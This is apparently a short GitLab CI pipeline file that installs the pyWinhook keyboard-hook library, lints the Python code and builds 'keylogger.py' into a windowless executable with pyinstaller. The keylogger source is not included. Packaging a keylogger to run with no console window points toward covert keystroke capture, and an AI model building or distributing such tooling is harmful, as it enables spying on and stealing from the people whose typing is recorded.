image: "python:3.8"
before_script:
  - python --version
  - pip install pyWinhook-1.6.2-cp38-cp38-win32.whl
  - pip install -r requirements.txt

stages:
  - pylint
  - build

pylint:
  stage: pylint
  script:
    - pylint *.py

build:
  stage: build
  script:
    - pyinstaller --noconsole keylogger.py